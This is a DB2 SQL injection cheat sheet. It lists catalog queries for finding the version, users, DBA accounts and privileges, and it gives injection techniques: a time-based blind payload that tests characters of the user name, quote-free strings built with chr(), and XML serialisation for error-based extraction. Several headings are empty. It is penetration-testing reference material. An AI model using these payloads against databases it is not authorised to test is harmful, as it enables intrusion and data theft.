DB2 Injection
DB2 Cheatsheet
select versionnumber, version_timestamp from sysibm.sysversions;
select service_level from table(sysproc.env_get_inst_info()) as instanceinfo
select getvariable('sysibm.version') from sysibm.sysdummy1 -- (v8+)
select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo
select service_level,bld_level from sysibmadm.env_inst_info
Current User
select user from sysibm.sysdummy1
select session_user from sysibm.sysdummy1
select system_user from sysibm.sysdummy1
List Users
DB2 uses OS accounts
select distinct(authid) from sysibmadm.privileges -- priv required
select grantee from syscat.dbauth -- incomplete results
select distinct(definer) from syscat.schemata -- more accurate
select distinct(grantee) from sysibm.systabauth -- same as previous
List Privileges
select * from syscat.tabauth -- shows priv on tables
select * from syscat.tabauth where grantee = current user -- shows privs for current user
select * from syscat.dbauth where grantee = current user;;
select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies
List DBA Accounts
select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'
select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = ‘Y’ or SYSADMAUTH = ‘G’
Current Database
List Databases
List Columns
List Tables
Find Tables From Column Name
Select Nth Row
select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only
Select Nth Char
select bitand(1,0) from sysibm.sysdummy1 -- returns 0. Also available bitandnot, bitor, bitxor, bitnot
Char -> ASCII Value
String Concat
select 'a' concat 'b' concat 'c' from sysibm.sysdummy1 -- returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1 -- returns 'ab'
IF Statement
Seems only allowed in stored procedures. Use case logic instead.
Case Statement
Avoiding Quotes
SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1 -- returns “ADRI”. Works without select too
Time Delay
Heavy queries, for example: If user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response. However, if user doesn't start with ascii 68, the heavy query won't execute and thus the response will be faster.
' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68
Serialize to XML (for error based)
select xmlagg(xmlrow(table_schema)) from sysibm.tables -- returns all in one xml-formatted string
select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables) -- Same but without repeated elements
select xml2clob(xmelement(name t, table_schema)) from sysibm.tables -- returns all in one xml-formatted string (v8). May need CAST(xml2clob(… AS varchar(500)) to display the result.
Command Execution and Local File Access
Seems it's only allowed from procedures or UDFs.
Hostname/IP and OS INFO
Location of DB Files
System Config
select dbpartitionnum, name, value from sysibmadm.dbcfg where name like 'auto_%' -- Requires priv. Retrieve the automatic maintenance settings in the database configuration that are stored in memory for all database partitions.
select name, deferred_value, dbpartitionnum from sysibmadm.dbcfg -- Requires priv. Retrieve all the database configuration parameters values stored on disk for all database partitions.
Default System Database